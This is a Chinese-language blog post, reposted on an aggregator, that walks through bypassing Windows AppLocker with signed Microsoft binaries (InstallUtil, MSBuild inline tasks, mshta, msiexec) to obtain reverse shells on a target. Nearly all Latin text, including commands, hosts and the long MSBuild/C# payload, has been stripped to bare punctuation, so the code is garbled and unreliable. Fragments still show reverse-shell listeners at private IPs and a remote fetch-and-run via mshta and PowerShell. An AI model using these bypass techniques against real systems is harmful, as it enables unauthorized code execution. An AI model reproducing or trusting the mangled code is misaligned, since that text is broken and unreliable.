hi,你好!欢迎访问本站!登录
推文论坛
当前位置:首页 - 科技生活 - 正文

黑客信息网:AppLocker绕过之途

2021-05-15科技生活网络科技5172°c
A+ A-

前言
在提权中我们经常会遇到目标开启了的情况,讲解的绕过技术。

这不仅仅是一个的文章,也是一个白名单利用文章。

(若无特殊说明,实验环境一律为 2012 2)

什么是
即&;应用程序控制策略&;,是 7系统中新增加的一项安全功能。在7以上的系统中默认都集成了该功能,我们可以使用在中启用 ,然后在 中找到 中看到选项。


0.
规则
默认的规则支持以下几种:

规则集合&;关联的文件格式
可执行文件&;.、.
脚本&;.1、.、.、.、.
文件&;.、.、.
封装应用和封装应用安装程序&;.
文件&;.、.
.并不是所有的都会存在,应根据版本来,在10上,创建规则后会在:\\32\生产相应的.文件。

规则条件
规则条件是用于帮助 标识要应用规则的应用的标准。三个主要规则条件为发布者、路径和文件哈希。

发布者:基于应用的数字签名标识它

路径:通过应用在计算机文件系统中或网络上的位置来标识它

文件哈希:表示已标识文件的系统计算的加密哈希


1.
默认规则
在你创建了一个规则后,系统会默认询问你是否添加一条默认规则,如下图所示:


2.
每个规则所对应的默认规则如下:

可执行的默认规则类型包括:

允许本地 组的成员运行所有应用。

允许 组的成员运行 文件夹中的应用。

允许 组的成员运行 文件夹中的应用。

脚本默认规则类型包括:

允许本地 组的成员运行所有脚本。

允许 组的成员运行 文件夹中的脚本。

允许 组的成员运行 文件夹中的脚本。

默认规则类型包括:

允许本地 组的成员运行所有 文件。

允许 组的成员运行所有已进行数字签名的 文件。

允许 组的成员运行 \ 文件夹中的所有 文件。

默认规则类型:

允许本地 组的成员运行所有 。

允许 组的成员运行 文件夹中的 。

允许 组的成员运行 文件夹中的 。

封装应用默认规则类型:

允许 组的成员安装和运行所有已签名的封装应用和封装应用安装程序

规则行为
可将规则配置为使用允许或拒绝操作:

**允许。**你可以指定允许在你的环境中运行的文件以及所针对的用户或用户组。你还可以配置例外以标识从规则中排除的文件。

**拒绝。**你可以指定 允许在你的环境中运行的文件以及所针对的用户或用户组。你还可以配置例外以标识从规则中排除的文件。


3.
创建一个规则
讲了那么多,我们以禁止在桌面上运行文件为例,创建一条规则。创建完大体如下:


4.
运行测试:


5.
系统就会阻止我们运行


.
是. 的一部分,是一个命令行程序,它使用户可以通过命令提示符快速安装和卸载应用程序。由于此实用程序是签名的二进制文件,因此可以用来绕过限制来运行任何.可执行文件。该实用程序也位于文件夹内,该文件夹不会应用策略,因为需要执行文件夹的内容才能使系统正常运行。

首先我们使用(://./040/)生成一个模板

. --_ .
--_ ///. --
//_ -- 192.168.0.103 -- 443

6.
上面的命令将生成一个#模板,其中将包含 。

将生成后的文件放到目标中使用下面的方法执行:

&;:\\.\\2.0.50727\. /=/= / //.
&;
&;
当然你也可以是先使用生成一个的,然后替换模板中的,然后将文件传到目标机。

然后用编译我们的脚本:

:\\.\\2.0.50727\.&; /:. .

7.
此时我们执行我们的文件试试:


9.
被规则拦截,那么我们使用

:\\.\\2.0.50727\. /=/= / .
绕过


10.
成功上线


11.
在中也有使用.进行的模块。

///_
原理是一样的


12.
附带常见的路径:

:\\.\\2.0.50727\.

:\\.\64\2.0.50727\.

:\\.\\4.0.30319\.

:\\.\64\4.0.30319\.

.
.( )是 使用的软件构建平台。它采用格式的项目文件,这些文件定义了构建各种平台和配置的要求。(引用: )

我们可以使用通过受信任的实用工具代理代码执行。.版本4中引入的内联任务功能允许将#代码插入项目文件中。内联任务将编译并执行内联任务。.是一个经过签名的二进制文件,因此,以这种方式使用它时,它可以执行任意代码,并绕过配置为允许.执行的应用程序白名单防护.

我们这里直接使用生成一个文件。

://.//. -- 192.168.0.106 -- 4444 - - //_.

13.
并且会给我们生成一个文件,我们可以使用 - 直接启动

然后使用执行,


14.
上线:


15.
当然你也可以是使用生成一个#的然后使用三好学生师傅的模板加载:

://./3/--///%20.

注意将后缀名改为.

除了反弹以外我们还可以用它来绕过的限制。


16.
代码如下:

&; =&;4.0&; =&;://..///2003&;&;
&; &;!-- # . --&;
&; &;!-- :\\.\64\4.0.30319\. . --&;
&;&; &;!-- : , : @ --&;
&; &;!-- : 3- --&;
&; &; =&;&;&;
&;&; &; /&;
&;&; &; /&;
&; &;/&;
&; &;
&;&;&; =&;&;
&;&;&; =&;&;
&;&;&; =&;:\\.\\4.0.30319\...4.0.&; &;
&;&;&; &;/&;
&;&;&; &;&;
&;&;&;&;&; &; =&;&; /&;
&;&; &; =&;.&; /&;
&;&;&;&;&; &; =&;&; =&;&;&;
&;&;&;&;&;&;&; &;![[
&;&;&;&;&;&; .(&; &;);
&;&;&;&;&;&;&; ]]&;
&;&;&;&;&; &;/&;
&;&;&; &;/&;
&;&;/&;
&;&;
&;&;&; =&;&;
&;&;&; =&;&;
&;&;&; =&;:\\.\\4.0.30319\...4.0.&; &;
&;&;&;
&;&; &; =&;..&; /&;
&;&;&;&;&; &; =&;&; =&;&;&;
&;&;&;&;&;&;&; &;![[
&;
&;
&;&;&; ;
&;&;&; .;
&;&;&; .;
&;&;&; .;
&;&;&; ..;
&;&;&;//
&;&;&; ..;
&;&;&; ..;
&;&;&; ...;
&;&;&; .;
&;&;&; ..;
&;&;&; ..;
&;
&;
&;&;&; :&; ,
&;&;&;{
&;&;&;&; ()
&;&;&;&;{
&;
&;
&;&;&;&;&;()
&;&;&;&;&;{
&;
&;
&;&;&;&;&;&;.(&; &;&;);
&;&;&;&;&;&; =.();
&;&;&;&;&;&;
&;&;&;&;&;&;{
&;&;&;&;&;&;&;.(());
&;&;&;&;&;&;}
&;&;&;&;&;&; ( )
&;&;&;&;&;&;{
&;&;&;&;&;&;&;.(.);
&;&;&;&;&;&;}
&;&;&;&;&;}
&;
&;
&;&;&;&;&;&;&;&; ;
&;&;&;&;}
&;
&;
&;&;&;&;// ' '
&;&;&;&; ( )
&;&;&;&;{
&;&;&;&;&;//
&;&;&;&;&; =.();
&;&;&;&;&;.();
&;&;&;&;&; = ();
&;&;&;&;&; =.();
&;&;&;&;&;//
&;&;&;&;&;..();
&;&;&;&;&;//
&;&;&;&;&;..(&;-&;);
&;&;&;&;&;&;&; =.();
&;&;&;&;&;.();
&;&;&;&;&;//
&;&;&;&;&; = ();
&;&;&;&;&; ( )
&;&;&;&;&;{
&;&;&;&;&;&;.();
&;&;&;&;&;}
&;&;&;&;&; .().();
&;&;&;&; }
&;
&;
&;&;&;&; ( )
&;&;&;&;{
&;&;&;&;&; =.();
&;&;&;&;&;.().();
&;&;&;&;}
&;
&;
&;
&;
&;&;&;}
&;
&;
&;
&;
&;
&;
&;
&;
&;&;&;&;&;&;&; ]]&;
&;&;&;&;&; &;/&;
&;&;&; &;/&;
&; &;/&;
&;/&;
原地址:://./3/--///%20.


17.
成功绕过对的限制。

常见路径如下:

:\\.\\2.0.50727\.

:\\.\64\2.0.50727\.

:\\.\\3.5\.

:\\.\64\3.5\.

:\\.\\4.0.30319\.

:\\.\64\4.0.30319\.

.
.是微软操作系统相关程序,英文全称 ,可翻译为微软超文本标记语言应用,用于执行.文件。默认已集成在环境变量中。

使用的方式有很多,我们这里使用的///_模块进行测试:

///_
(//_) &; 192.168.1.109
(//_) &;

0.
目标机执行:

. ://192.168.0.106:8080/136.
即可上线。

除了这种方法还可以使用 、、 、、、、 等进行上线。

除了本地文件,还支持远程下载的方式执行,比如:

. :=(&;:://..//.&;).();();
除了以上的方式,可以用用来执行:

&;&;
&;&;
&; =&;&;&;
&;&;&; =(&;.&;)
&;&;&; . &; - - - (- .).('://:/')&;
&;/&;
&;/&;
&;&;
&;/&;
&;/&;
即使已经禁止执行了


1.
.
.是一个用来进行安装的工具,具有微软签名,存在路径为:

:\\32\.

:\\64\.

我们也可以用它来绕过一些限制。用法就是直接该文件后面跟你的文件即可。

未定义标签

本文来源:推文收录网

本文地址:https://www.hzccw.com/i/122659.html

版权声明:本站收录微信公众号文章内容全部来自于网络,部分内容为用户投稿内容,本站所有内容仅供个人学习、研究或者欣赏使用。版权归原作者所有。禁止一切商业用途。其中内容并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。如果您发现本站上有侵犯您的知识产权的内容,请与我们联系,我们会及时修改或删除。